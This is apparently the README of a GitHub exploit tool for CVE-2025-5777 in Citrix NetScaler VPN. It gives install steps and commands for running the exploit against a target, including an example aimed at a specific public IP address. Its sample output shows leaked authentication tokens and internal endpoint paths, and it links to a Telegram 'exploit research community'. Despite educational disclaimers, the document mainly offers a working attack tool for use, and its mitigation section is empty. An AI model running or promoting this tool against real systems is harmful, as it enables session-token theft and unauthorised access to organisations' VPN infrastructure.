
Async-based exploit tool for CVE-2025-5777 that detects and extracts leaked authentication tokens, internal IPs, and hidden endpoint paths from vulnerable Citrix NetScaler VPN endpoints.
A powerful educational tool designed to demonstrate and analyze the vulnerability CVE-2025-5777 affecting Citrix NetScaler VPN.
This project is part of the GO-TO CVE initiative.
⚠️ For educational purposes only. Do NOT use this on systems you don't own or have explicit permission to test.
This script attempts to detect and extract sensitive internal tokens, internal IPs, and hidden endpoint paths exposed by vulnerable Citrix VPN endpoints.
It's built to help students, security researchers, and red teamers better understand how real-world CVEs are discovered and analyzed.
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Requires Python 3.8+ Optional: You can use a virtual environment
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 to route through Burp/SOCKS--silent to suppress output--output result.json to save to JSONExample:
python3 exploit.py https://20.237.190.100 --output leaks.json

[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
and

To avoid exploitation of this CVE:
This tool is released strictly for educational and lawful research purposes. The developer takes no responsibility for any misuse or illegal activity conducted using this code.
By using this tool, you agree that:
Join the CVE leak and exploit research community: 👉 https://t.me/GOTOCVE
Developed by Ali Soltani – red teamer and CVE hunter.
Proudly part of the GO-TO CVE